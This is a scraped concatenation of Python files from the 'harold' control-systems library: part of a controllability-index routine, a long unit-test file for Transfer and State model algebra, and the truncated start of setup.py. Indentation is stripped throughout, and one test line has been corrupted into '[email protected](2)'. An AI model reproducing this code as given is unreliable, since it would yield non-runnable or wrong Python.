a, _ = _makearray(A)
b, _ = _makearray(B)
_assertRank2(a, b)
_assertNoEmpty2d(a, b)
_assertNdSquareness(a)
n, m = b.shape
if a.shape[0] != b.shape[0]:
raise ValueError("A and B should have the same number of rows")
# FIXME: Tolerance is a bit arbitrary for now!!
tol = np.sqrt(np.spacing(1.))*n**2 if tol is None else tol
# Will be populated below
remaining_cols = np.arange(m)
indices = np.zeros(m, dtype=int)
# Get the orthonormal columns of b first
q, r, p = qr(b, mode='economic', pivoting=True)
rank_b = sum(np.abs(np.diag(r)) > max(m, n)*np.spacing(norm(b, 2)))
remaining_cols = remaining_cols[p][:rank_b].tolist()
q = q[:, :rank_b]
indices[remaining_cols] += 1
w = np.empty((n, 1), dtype=float)
# Start the iteration - at most n-1 spins
for k in range(1, n):
# prepare new A @ Q test vectors
q_bank = a @ q[:, -len(remaining_cols):]
for ind, col in enumerate(remaining_cols.copy()):
w[:] = q_bank[:, [ind]]
for reorthogonalization in range(2):
w -= ((q.T @ w).T * q).sum(axis=1, keepdims=True)
normw = norm(w)
if normw <= tol:
remaining_cols.remove(col)
continue
else:
q = np.append(q, w/normw, axis=1)
indices[col] += 1
if len(remaining_cols) == 0:
break
return indices
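# Minimal usage sketch (illustrative):
#
#   A = np.array([[0., 1.], [0., 0.]])
#   B = np.array([[0.], [1.]])
#   controllability_indices(A, B)   # -> array([2])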
```
#### File: harold/tests/test_classes.py
```python
import numpy as np
from numpy.linalg import LinAlgError
from numpy.random import seed
from harold import (Transfer, State, e_i, haroldcompanion,
transmission_zeros, state_to_transfer, transfer_to_state,
random_state_model, concatenate_state_matrices)
from numpy.testing import (assert_,
assert_equal,
assert_array_equal,
assert_raises,
assert_almost_equal,
assert_array_almost_equal)
def test_concatenate_state_matrices():
G = State(1, 2, 3, 4)
M = concatenate_state_matrices(G)
assert_array_equal(M, np.array([[1, 2], [3, 4]])) # 1
G = State(np.eye(4))
assert_array_equal(concatenate_state_matrices(G), np.eye(4))
def test_Transfer_Instantiations():
assert_raises(TypeError, Transfer)
# Double list is MIMO, num is SISO --> Static!
G = Transfer(1, [[1, 2, 1]])
assert_equal(len(G.num), 1)
assert_equal(len(G.num[0]), 3)
assert_equal(G.shape, (1, 3))
assert_(G._isgain)
G = Transfer(1, np.array([[2, 1, 1]]))
assert_(G._isSISO)
G = Transfer([[1]], [1, 2, 1])
assert_(G._isSISO)
assert_equal(G.num.shape, (1, 1))
assert_equal(G.den.shape, (1, 3))
G = Transfer([[1, 2]], [1, 2, 1])
assert_(not G._isSISO)
assert_equal(len(G.num[0]), 2)
assert_equal(len(G.den[0]), 2)
assert_equal(G.shape, (1, 2))
num = [[np.array([1, 2]), 1], [np.array([1, 2]), 0]]
den = [1, 4, 4]
G = Transfer(num, den)
assert_equal(len(G.num), 2)
assert_equal(len(G.num[0]), 2)
assert_equal(G.shape, (2, 2))
G = Transfer(1)
assert_(G._isSISO)
assert_equal(G.num, np.array([[1]]))
assert_equal(G.den, np.array([[1]]))
G = Transfer(None, 1)
assert_(G._isSISO)
assert_equal(G.num, np.array([[1]]))
assert_equal(G.den, np.array([[1]]))
G = Transfer(np.random.rand(3, 2))
assert_(not G._isSISO)
assert_equal(G.shape, (3, 2))
assert_equal(G.poles.size, 0)
assert_raises(IndexError, Transfer, np.ones((3, 2)), [[[1, 2], [1, 1]]])
def test_Transfer_property():
G = Transfer([1, 1], [1, 1, 1])
assert G.DiscretizedWith is None
G.SamplingPeriod = 0.1
G.DiscretizedWith = 'zoh'
assert G.DiscretizedWith == 'zoh'
G = Transfer([1, 1], [1, 1, 1])
G.num = [1, 2, 1]
with assert_raises(IndexError):
G.num = [[1, [1, 2]]]
G.den = [1, 2, 1]
with assert_raises(IndexError):
G.den = [[[1, 2, 3], [1, 2, 5]]]
with assert_raises(ValueError):
G.DiscretizedWith = 'zoh'
with assert_raises(ValueError):
G.DiscretizationMatrix = 1.
G = Transfer([0.1, 0.1, -0.5], [1, 1.3, 0.43], 0.1)
with assert_raises(ValueError):
G.DiscretizedWith = 'some dummy method'
G.DiscretizedWith = 'lft'
G.DiscretizationMatrix = np.array([[1, 2], [1.5, 5.]]) # dummy array
assert_array_equal(G.DiscretizationMatrix, np.array([[1, 2], [1.5, 5.]]))
with assert_raises(ValueError):
G.DiscretizationMatrix = [1., 1.]
with assert_raises(ValueError):
G.PrewarpFrequency = 200
G = Transfer([1, 1], [1, 1, 1], dt=0.1)
G.DiscretizedWith = 'tustin'
G.PrewarpFrequency = 0.02
assert G.PrewarpFrequency == 0.02
def test_Transfer_to_array():
G = Transfer(1, [1, 1])
H = Transfer(2, 10)
with assert_raises(ValueError):
G.to_array()
assert_equal(H.to_array(), np.array([[.2]]))
assert_equal(Transfer(np.arange(9, 90, 9).reshape(3, 3),
9*np.ones((3, 3))).to_array(),
np.arange(1, 10).reshape(3, 3))
def test_Transfer_algebra_mul_rmul_dt():
G = Transfer(1, [1, 2], dt=0.1)
F = Transfer(1, [1, 3])
with assert_raises(ValueError):
F*G
def test_Transfer_algebra_truediv_rtruediv():
G = Transfer(1, [1, 2])
F = G/0.5
assert_equal(F.num, np.array([[2.]]))
assert_equal(F.den, np.array([[1., 2.]]))
# invert a nonproper system
with assert_raises(ValueError):
G/G
# invert a singular system
with assert_raises(LinAlgError):
1 / (np.ones((2, 2))*(1+G))
with assert_raises(ValueError):
G/3j
# invert an invertible system
J = 1 / (np.eye(2) * G + np.array([[1, 2], [3, 4]]))
nn, dd = J.polynomials
nnact = np.array([[x[0].tolist() for x in y] for y in nn])
ddact = np.array([[x[0].tolist() for x in y] for y in dd])
nndes = np.array([[[-2., -8.5, -9.], [1., 4., 4.]],
[[1.5, 6., 6.], [-0.5, -2.5, -3.]]])
dddes = np.array([[[1., 1.5, -1.5], [1., 1.5, -1.5]],
[[1., 1.5, -1.5], [1., 1.5, -1.5]]])
assert_array_almost_equal(nnact, nndes)
assert_array_almost_equal(ddact, dddes)
G = Transfer(np.eye(3)*0.5)
assert_array_almost_equal((1 / G).to_array(), np.eye(3)*2)
def test_Transfer_algebra_mul_rmul_scalar_array():
NUM = [[[12], [-18]], [[6], [-24]]]
DEN = [[[14, 1.], [21., 1.]], [[7, 1.], [49, 1.]]]
G = Transfer(NUM, DEN)
for H in (np.eye(2)*G, G*np.eye(2)):
assert_equal(H.num[0][1], np.array([[0.]]))
assert_equal(H.num[1][0], np.array([[0.]]))
assert_equal(H.den[0][1], np.array([[1.]]))
assert_equal(H.den[1][0], np.array([[1.]]))
assert_equal(H.num[0][0], G.num[0][0])
assert_equal(H.num[1][1], G.num[1][1])
assert_equal(H.den[0][0], G.den[0][0])
assert_equal(H.den[1][1], G.den[1][1])
H = 1/6*G
assert_equal(float(H.num[0][0]), 2.)
assert_equal(float(H.num[0][1]), -3.)
assert_equal(float(H.num[1][0]), 1.)
assert_equal(float(H.num[1][1]), -4.)
G = Transfer([[1, 2]], [1, 1])
H = np.array([2, 1]) * G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[2.]]))
H = np.array([2, 0]) * G
assert_array_equal(H.num[0][1], np.array([[0.]]))
assert_array_equal(H.den[0][1], np.array([[1.]]))
H = np.array([[2]]) * G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
with assert_raises(ValueError):
H = np.array([2+1j, 1]) * G
J = H*0.
assert_array_equal(J.num[0][0], np.array([[0.]]))
assert_array_equal(J.num[0][1], np.array([[0.]]))
assert_array_equal(J.den[0][0], np.array([[1.]]))
assert_array_equal(J.den[0][1], np.array([[1.]]))
G = Transfer(1, [1, 1])
H = G*0.
assert_array_equal(H.num, np.array([[0.]]))
assert_array_equal(H.den, np.array([[1.]]))
def test_Transfer_algebra_mul_rmul_siso_mimo():
F = Transfer(2, [1, 1])
H = Transfer(np.arange(1, 5).reshape(2, 2), [1, 2])
K = Transfer([1, 3], [1, 0, 1])
FK_num, FK_den = (F*K).polynomials
assert_equal(FK_num, np.array([[2, 6]]))
assert_equal(FK_den, np.array([[1, 1, 1, 1]]))
for J in (F*H, H*F):
for x in range(2):
for y in range(2):
assert_equal(J.num[x][y], np.array([[(1+y+2*x)*2]]))
assert_equal(J.den[x][y], np.array([[1, 3, 2]]))
H = Transfer([1, 2], [1, 2, 3])*np.arange(1, 5).reshape(2, 2)
HH = H*H
for x in range(4):
assert_equal(sum(HH.den, [])[x], np.array([[1., 4., 10., 12., 9.]]))
assert_equal(sum(HH.num, [])[x], (x+1)**2 * np.array([[1., 4., 4.]]))
F = Transfer(1, [1, 1])
H = State(1, 2, 3, 4, 0.1)
with assert_raises(ValueError):
F*H
with assert_raises(ValueError):
F*'string'
def test_Transfer_algebra_matmul_rmatmul():
G = Transfer([[1, [1, 1]]], [[[1, 2, 1], [1, 1]]])
H = Transfer([[[1, 3]], [1]], [1, 2, 1])
F = G @ H
assert_almost_equal(F.num, np.array([[1, 3, 4]]))
assert_almost_equal(F.den, np.array([[1, 4, 6, 4, 1]]))
F = H @ G
assert_almost_equal(F.num[0][0], np.array([[1, 3]]))
assert_almost_equal(F.num[0][1], np.array([[1, 4, 3]]))
assert_almost_equal(F.num[1][0], np.array([[1]]))
assert_almost_equal(F.num[1][1], np.array([[1, 1]]))
assert_almost_equal(F.den[0][0], np.array([[1, 4, 6, 4, 1]]))
assert_almost_equal(F.den[0][1], np.array([[1, 3, 3, 1]]))
assert_almost_equal(F.den[1][0], F.den[0][0])
assert_almost_equal(F.den[1][1], F.den[0][1])
F = Transfer(2) @ Transfer(np.eye(2)) @ Transfer(2)
assert_equal(F.to_array(), 4*np.eye(2))
G = Transfer([[1, 2]], [1, 1])
H = np.array([[2], [1]]) @ G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
assert_array_equal(H.num[1][0], np.array([[1.]]))
assert_array_equal(H.num[1][1], np.array([[2.]]))
G = Transfer([[1, 2]], [1, 1])
H = G @ np.array([[2], [1]])
assert H._isSISO
assert_array_almost_equal(H.num, np.array([[4.]]))
assert_array_almost_equal(H.den, np.array([[1., 1.]]))
H = np.array([[2]]) @ G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
with assert_raises(ValueError):
H = np.array([2+1j, 1]) * G
J = H*0.
assert_array_equal(J.num[0][0], np.array([[0.]]))
assert_array_equal(J.num[0][1], np.array([[0.]]))
assert_array_equal(J.den[0][0], np.array([[1.]]))
assert_array_equal(J.den[0][1], np.array([[1.]]))
G = Transfer(1, [1, 1])
H = G*0.
assert_array_equal(H.num, np.array([[0.]]))
assert_array_equal(H.den, np.array([[1.]]))
def test_Transfer_algebra_neg_add_radd():
G = Transfer(1, [1, 2, 1])
assert_equal(-(G.num), (-G).num)
H = Transfer([1, 1], [1, 0.2], 0.1)
with assert_raises(ValueError):
G + H
G, H = Transfer(1), Transfer(2)
assert_equal((G+H).num, np.array([[3.]]))
G, H = Transfer(1), State(5)
assert isinstance(G+H, State)
G = Transfer(1, [1, 1])
assert_equal((G+(-G)).num, np.array([[0.]]))
assert_almost_equal((G + 5).num, np.array([[5, 6]]))
G = Transfer([[1, 2]], [1, 1])
H = G + np.array([[3, 4]])
assert_equal(H.num[0][0], np.array([[3., 4.]]))
with assert_raises(IndexError):
G + np.array([3, 4])
G = Transfer([[1, [1, 1]]], [[[1, 2, 1], [1, 1]]])
F = - G
assert_almost_equal(G.num[0][0], -F.num[0][0])
assert_almost_equal(G.num[0][1], -F.num[0][1])
H = F + G
for x in range(2):
assert_array_equal(H.num[0][x], np.array([[0]]))
assert_array_equal(H.den[0][x], np.array([[1]]))
G = Transfer(1, [1, 2, 3])
F = 5 + G
assert_almost_equal(F.num, np.array([[5, 10, 16.]]))
assert_almost_equal(F.den, G.den)
F = G + 3
assert_almost_equal(F.num, np.array([[3, 6, 10.]]))
assert_almost_equal(F.den, G.den)
F = F * 5
assert_almost_equal(F.num, np.array([[15, 30, 50]]))
assert_almost_equal(F.den, G.den)
F *= 0.4
assert_almost_equal(F.num, np.array([[6, 12, 20]]))
assert_almost_equal(F.den, G.den)
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1., 0, 0, 4]]]
num2 = [[[0, 0, 0, -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
G = Transfer(num1, den1)
assert_raises(ValueError, Transfer, num2, den2)
den2[1][1] = [2, -1, -1]
F = Transfer(num2, den2)
H = G + F
# Flatten list of lists via sum( , []) trick
Hnum = [np.array([[-1., 5/3, 10/3]]),
np.array([[5., 6., 9.]]),
np.array([[1., 0.5, -0.5]]),
np.array([[1., 3., 0.75, -0.5]]),
np.array([[3., -2.]]),
np.array([[5., -4., 3., 16.]])
]
Hden = [np.array([[1., -2/3, -4/3]]),
np.array([[1., 2., 3., 0., 0.]]),
np.array([[1., 0.5, -0.5]]),
np.array([[1., 0.75, -0.5, 0., 0.]]),
np.array([[1., -0.5, -0.5]]),
np.array([[1., 0., 0., 4., 0.]])
]
Hnum_computed = sum(H.num, [])
Hden_computed = sum(H.den, [])
for x in range(np.multiply(*H.shape)):
assert_almost_equal(Hnum[x], Hnum_computed[x])
assert_almost_equal(Hden[x], Hden_computed[x])
def test_Transfer_slicing():
Hind = [(1, 5), (4, 1),
(4, 5), (1, 1),
(2, 5), (4, 2),
(2, 5), (4, 2),
(1, 2), (2, 1),
(2, 5), (4, 3)]
np.random.seed(1234)
H = state_to_transfer(State(np.random.rand(3, 3),
np.random.rand(3, 5),
np.random.rand(4, 3)))
F = Transfer(np.random.rand(4, 5))
for s, sind in ((H, Hind), (F, Hind)):
for ind, x in enumerate([s[1, :], s[:, 1],
s[:, :], s[0, 0],
s[1:3, :], s[:, 1:3],
s[[1, 2], :], s[:, [1, 2]],
s[2, [1, 2]], s[[1, 2], 2],
s[::2, :], s[:, ::2]]):
assert_equal(x.shape, sind[ind])
assert_raises(ValueError, H.__setitem__)
def test_State_Instantiations():
assert_raises(TypeError, State)
G = State(5)
assert_(G.a.size == 0)
assert_(G._isSISO)
assert_(G._isgain)
assert_equal(G.d, np.array([[5.]]))
G = State(np.eye(2))
assert_equal(G.shape, (2, 2))
assert_(G._isgain)
assert_(not G._isSISO)
# Wrong sized A, B, C, D
assert_raises(ValueError, State, np.ones((3, 2)), [[1], [2]], [1, 2])
assert_raises(ValueError, State, np.eye(2), [[1], [2], [3]], [1, 2])
assert_raises(ValueError, State, np.eye(2), [[1], [2]], [1, 2, 3])
assert_raises(ValueError, State, np.eye(2), [[1], [2]], [1, 2], [0, 0])
def test_State_to_array():
G = State(1, 1, 1)
H = State(5)
with assert_raises(ValueError):
G.to_array()
assert_equal(H.to_array(), np.array([[5]]))
H = State(np.ones((4, 4)))
assert_equal(H.to_array(), np.ones((4, 4)))
def test_State_algebra_mul_rmul_dt():
G = State(1, 2, 3, 4, dt=0.1)
F = State(4, 3, 2, 1)
with assert_raises(ValueError):
F*G
with assert_raises(ValueError):
G*F
def test_State_algebra_truediv_rtruediv():
G = State(1, 2, 3, 4)
F = G/0.5
assert_equal(F.b, np.array([[4.]]))
assert_equal(F.d, np.array([[8.]]))
G.d = 0.
with assert_raises(LinAlgError):
G/G
with assert_raises(ValueError):
G/3j
G.d = 4
# nonminimal but acceptable
H = G / G
ha, hb, hc, hd = H.matrices
assert_array_almost_equal(ha, [[1, -1.5], [0, -0.5]])
assert_array_almost_equal(hb, [[0.5], [0.5]])
assert_array_almost_equal(hc, [[3, -3]])
assert_array_almost_equal(hd, [[1]])
G = State(np.eye(3)*0.5)
assert_array_almost_equal((1 / G).to_array(), np.eye(3)*2)
def test_State_algebra_mul_rmul_scalar_array():
G = State(np.diag([-1, -2]), [[1, 2], [3, 4]], np.eye(2))
F = G*np.eye(2)
Fm = [email protected](2)
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(Fm))
F = np.eye(2)*G
Fm = np.eye(2)@G
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(Fm))
H = 1/2*G
assert_equal(H.c, 0.5*G.c)
def test_State_matmul_rmatmul_ndarray():
H = State([[-5, -2], [1, 0]], [[2], [0]], [3, 1], 1)
J1 = np.array([[-5., -2., 0., 0., 0., 0., 2., 4., 6., 8.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., -5., -2., 0., 0., 10., 12., 14., 16.],
[0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., -5., -2., 18., 20., 22., 24.],
[0., 0., 0., 0., 1., 0., 0., 0., 0., 0.],
[3., 1., 0., 0., 0., 0., 1., 2., 3., 4.],
[0., 0., 3., 1., 0., 0., 5., 6., 7., 8.],
[0., 0., 0., 0., 3., 1., 9., 10., 11., 12.]])
J2 = np.array([[-5., -2., 0., 0., 0., 0., 2., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., -5., -2., 0., 0., 0., 2., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., -5., -2., 0., 0., 2.],
[0., 0., 0., 0., 1., 0., 0., 0., 0.],
[3., 1., 6., 2., 9., 3., 1., 2., 3.],
[12., 4., 15., 5., 18., 6., 4., 5., 6.],
[21., 7., 24., 8., 27., 9., 7., 8., 9.],
[30., 10., 33., 11., 36., 12., 10., 11., 12.]])
mat = np.arange(1, 13).reshape(3, 4)
Fm = concatenate_state_matrices(mat @ H)
assert_array_almost_equal(J1, Fm)
Fm = concatenate_state_matrices(H @ mat)
assert_array_almost_equal(J1, Fm)
mat = np.arange(1, 13).reshape(4, 3)
Fm = concatenate_state_matrices(mat @ H)
assert_array_almost_equal(J2, Fm)
Fm = concatenate_state_matrices(H @ mat)
assert_array_almost_equal(J2, Fm)
G, H = random_state_model(2, 2, 2), random_state_model(2, 3, 3)
with assert_raises(ValueError):
G @ H
# Scalars
G = random_state_model(1)
H = 0. @ G
assert H._isgain
H = 1. @ G
assert_almost_equal(concatenate_state_matrices(G),
concatenate_state_matrices(H))
# static gain mults
G = random_state_model(0, 4, 5)
H = random_state_model(0, 5, 4)
assert (G@H)._isgain
assert_equal((G@H).shape, (4, 4))
H = random_state_model(0, 3, 3)
with assert_raises(ValueError):
G @ H
G = State(1.)
H = random_state_model(1, 2, 2)
assert_almost_equal(concatenate_state_matrices(G @ H),
concatenate_state_matrices(H @ G))
G = random_state_model(1, 4, 5)
H = random_state_model(1, 4, 5)
with assert_raises(ValueError):
G @ H
def test_State_algebra_mul_rmul_mimo_siso():
sta_siso = State(5)
sta_mimo = State(2.0*np.eye(3))
dyn_siso = State(haroldcompanion([1, 3, 3, 1]), e_i(3, -1), e_i(3, 1).T)
dyn_mimo = State(haroldcompanion([1, 3, 3, 1]), e_i(3, [1, 2]), np.eye(3))
dyn_mimo_sq = State(haroldcompanion([1, 3, 3, 1]), np.eye(3), np.eye(3))
G = dyn_siso * dyn_mimo
J = np.array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0.],
[-1., -3., -3., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0.],
[0., 0., 0., -1., -3., -3., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0., 0., -1., -3., -3., 0., 1.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(G), J)
G = dyn_mimo * dyn_siso
assert_array_almost_equal(concatenate_state_matrices(G), J)
G = dyn_mimo * sta_siso
assert_array_almost_equal(G.b, 5*dyn_mimo.b)
assert_array_almost_equal(G.d, 5*dyn_mimo.d)
assert_raises(ValueError, sta_mimo.__add__, dyn_mimo)
F = sta_mimo @ dyn_mimo
J = np.array([[0., 1., 0., 0., 0.],
[0., 0., 1., 1., 0.],
[-1., -3., -3., 0., 1.],
[2., 0., 0., 0., 0.],
[0., 2., 0., 0., 0.],
[0., 0., 2., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(F), J)
assert_almost_equal((dyn_mimo_sq + sta_mimo).d, 2*np.eye(3))
def test_State_algebra_add_radd():
sta_siso = State(5)
sta_mimo = State(2.0*np.eye(3))
dyn_siso = State(haroldcompanion([1, 3, 3, 1]), e_i(3, -1), e_i(3, 1).T)
dyn_mimo = State(haroldcompanion([1, 3, 3, 1]), e_i(3, [1, 2]), np.eye(3))
dyn_mimo_sq = State(haroldcompanion([1, 3, 3, 1]), np.eye(3), np.eye(3))
G = dyn_mimo + sta_siso
assert_array_almost_equal(G.d, sta_siso.to_array()*np.ones(dyn_mimo.shape))
assert_raises(ValueError, dyn_mimo.__add__, sta_mimo)
G = dyn_mimo_sq + sta_mimo
assert_array_almost_equal(G.d, 2.*np.eye(3))
G = dyn_mimo + dyn_siso
J = np.array([[0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 1., 0.],
[-1., -3., -3., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., -1., -3., -3., 1., 1.],
[1., 0., 0., 0., 1., 0., 0., 0.],
[0., 1., 0., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(G), J)
assert_raises(ValueError, dyn_mimo.__add__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__sub__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__radd__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__rsub__, dyn_mimo_sq)
def test_State_slicing():
F = State(1, 2, 3, 4)
F0 = F[0, 0]
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(F0))
F = State(np.random.rand(4, 4))
H = State(F.d, np.random.rand(4, 3), np.random.rand(5, 4))
Hind = [(1, 3), (5, 1),
(5, 3), (1, 1),
(2, 3), (5, 2),
(2, 3), (5, 2),
(1, 2), (2, 1),
(3, 3), (5, 2)]
Find = [(1, 4), (4, 1),
(4, 4), (1, 1),
(2, 4), (4, 2),
(2, 4), (4, 2),
(1, 2), (2, 1),
(2, 4), (4, 2)]
for s, sind in ((H, Hind), (F, Find)):
for ind, x in enumerate([s[1, :], s[:, 1],
s[:, :], s[0, 0],
s[1:3, :], s[:, 1:3],
s[[1, 2], :], s[:, [1, 2]],
s[2, [1, 2]], s[[1, 2], 2],
s[::2, :], s[:, ::2]]):
assert_equal(x.shape, sind[ind])
assert_raises(ValueError, H.__setitem__)
def test_model_zeros():
# Test example
A = np.array(
[[-3.93, -0.00315, 0, 0, 0, 4.03E-5, 0, 0, 0],
[368, -3.05, 3.03, 0, 0, -3.77E-3, 0, 0, 0],
[27.4, 0.0787, -5.96E-2, 0, 0, -2.81E-4, 0, 0, 0],
[-0.0647, -5.2E-5, 0, -0.255, -3.35E-6, 3.6e-7, 6.33E-5, 1.94E-4, 0],
[3850, 17.3, -12.8, -12600, -2.91, -0.105, 12.7, 43.1, 0],
[22400, 18, 0, -35.6, -1.04E-4, -0.414, 90, 56.9, 0],
[0, 0, 2.34E-3, 0, 0, 2.22E-4, -0.203, 0, 0],
[0, 0, 0, -1.27, -1.00E-3, 7.86E-5, 0, -7.17E-2, 0],
[-2.2, -177e-5, 0, -8.44, -1.11E-4, 1.38E-5, 1.49E-3, 6.02E-3, -1E-10]
])
B = np.array([[0, 0],
[0, 0],
[1.56, 0],
[0, -5.13E-6],
[8.28, -1.55],
[0, 1.78],
[2.33, 0],
[0, -2.45E-2],
[0, 2.94E-5]
])
C = e_i(9, [5, 8], output='r')
D = np.zeros((2, 2))
zs = transmission_zeros(A, B, C, D)
res = np.array([-2.64128629e+01 - 0j,
-2.93193619 - 0.419522621j,
-9.52183370e-03 + 0j,
-2.93193619 + 0.419522621j,
1.69789270e-01 - 0j,
5.46527700e-01 - 0j])
# Sort is numerically too sensitive for imaginary parts.
assert_almost_equal(np.sort(np.imag(zs)), np.sort(np.imag(res))) # 0.0
assert_almost_equal(np.sort(np.real(zs)), np.sort(np.real(res))) # 0.1
# An example found online (citation lost), please let me know
A = np.array([[-6.5000, 0.5000, 6.5000, -6.5000],
[-0.5000, -5.5000, -5.5000, 5.5000],
[-0.5000, 0.5000, 0.5000, -6.5000],
[-0.5000, 0.5000, -5.5000, -0.5000]])
B = np.array([[0., 1, 0],
[2., 1, 2],
[3., 4, 3],
[3., 2, 3]])
C = np.array([[1, 1, 0, 0]])
D = np.zeros((1, 3))
zs = transmission_zeros(A, B, C, D)
res = np.array([-7, -6])
assert_almost_equal(np.sort(res), np.sort(zs)) # 1
# Example from Reinschke, 1988
A = np.array([[0, 0, 1, 0, 0, 0],
[2, 0, 0, 3, 4, 0],
[0, 0, 5, 0, 0, 6],
[0, 7, 0, 0, 0, 0],
[0, 0, 0, 8, 9, 0],
[0, 0, 0, 0, 0, 0]])
B = np.array([[0, 0, 0, 0, 10, 0], [0, 0, 0, 0, 0, 11]]).T
C = np.array([[0, 12, 0, 0, 13, 0],
[14, 0, 0, 0, 0, 0],
[15, 0, 16, 0, 0, 0]])
D = np.zeros((3, 2))
zs = transmission_zeros(A, B, C, D)
res = np.array([-6.78662791+0.j, 3.09432022+0.j])
assert_almost_equal(np.sort(zs), np.sort(res)) # 2
def test_static_model_conversion_sampling_period():
G = State(np.eye(5), dt=0.001)
H = state_to_transfer(G)
assert_(H._isgain) # 0
assert_(not H._isSISO) # 1
assert_equal(H.SamplingPeriod, 0.001) # 2
K = transfer_to_state(H)
assert_equal(K.SamplingPeriod, 0.001) # 3
def test_random_state_model():
seed(12345)
# Simple arguments
G = random_state_model(0)
assert G._isgain
assert G._isSISO
G = random_state_model(1)
assert not G._isgain
assert G._isSISO
G = random_state_model(1, 1, 2)
assert not G._isgain
assert not G._isSISO
G = random_state_model(5, 2, 4, stable=False)
assert np.any(G.poles.real > 0)
G = random_state_model(11, stable=False, prob_dist=[0, 0, 0.5, 0.5])
assert_array_almost_equal(np.abs(G.poles.real), np.zeros(11))
assert np.any(G.poles.imag)
a1 = random_state_model(101, dt=0.1).poles
assert np.all(np.abs(a1) <= 1.)
def test_basic_pole_properties():
G = Transfer(0.5, [1, 4, 3]) + 5
zzz = G.pole_properties()
assert_array_almost_equal(zzz,
np.array([[-1.+0.j, 1.+0.j, 1.+0.j],
[-3.+0.j, 3.+0.j, 1.+0.j]]))
def test_transfer_to_state():
# Models with static column/row
num, den = [[1, -1], [[1, -1], 0]], [[[1, 2], 1], [[1, 2], 1]]
den2, num2 = [list(i) for i in zip(*den)], [list(i) for i in zip(*num)]
G = Transfer(num, den)
H = Transfer(num2, den2)
Gs = transfer_to_state(G)
Hs = transfer_to_state(H)
Gm = concatenate_state_matrices(Gs)
Hm = concatenate_state_matrices(Hs)
assert_array_almost_equal(Gm, np.array([[-2, 1, 0],
[1, 0, -1],
[-3, 1, 0]]))
assert_array_almost_equal(Hm, np.array([[-2., 0., 1., 0.],
[0., -2., 0., 1.],
[1., -3., 0., 1.],
[0., 0., -1., 0.]]))
# Example from Kalman 1963
num = [[3*np.poly([-3, -5]), [6, 6], [2, 7], [2, 5]],
[2, 1, [2, 10], [8, 16]],
[[2, 14, 36], [-2, 0], 1, 2*np.convolve([5, 17], [1, 2])]]
den = [[np.poly([-1, -2, -4]), [1, 6, 8], [1, 7, 12], [1, 5, 6]],
[[1, 8, 15], [1, 3], np.poly([-1, -2, -3]), np.poly([-1, -3, -5])],
[np.poly([-1, -3, -5]), [1, 4, 3], [1, 3], np.poly([-1, -3, -5])]]
G = Transfer(num, den)
H = transfer_to_state(G)
p = H.poles
p.sort()
assert_array_almost_equal(p, np.array([-5.+0.j, -5.+0.j, -4.+0.j,
-3.+0.j, -3.+0.j, -3.+0.j,
-2.+0.j, -2.+0.j, -1.+0.j,
-1.+0.j, -1.+0.j]))
    # Reported in gh-42
G = Transfer([[[87.8, 8.78], [-103.68, -8.64]],
[[129.84, 10.82], [-109.6, -10.96]]],
[562.5, 82.5, 1])
Gss = transfer_to_state(G)
assert_array_almost_equal(Gss.a, np.kron(np.eye(2), [[0., 1.],
[-2/1125, -11/75]]))
assert_array_almost_equal(Gss.b, [[0, 0], [1, 0], [0, 0], [0, 1]])
des_c = np.array([[0.01560888888888889,
0.1560888888888889,
-0.015360000000000002,
-0.18432],
[0.019235555555555558,
0.23082666666666668,
-0.019484444444444447,
-0.19484444444444443]])
assert_array_almost_equal(Gss.c, des_c)
assert_array_almost_equal(Gss.d, np.zeros([2, 2]))
def test_state_to_transfer():
G = State(-2*np.eye(2), np.eye(2), [[1, -3], [0, 0]], [[0, 1], [-1, 0]])
H = state_to_transfer(G)
H11 = H[1, 1]
assert_array_equal(H11.num, np.array([[0.]]))
assert_array_equal(H11.den, np.array([[1.]]))
```
#### File: josephcslater/harold/setup.py
```python
import sys
import os
from os.path import abspath, dirname
import io
import subprocess
from setuptools import setup
# Borrowing some .git machinery from SciPy's setup.py
if sys.version_info[:2] < (3, 6):
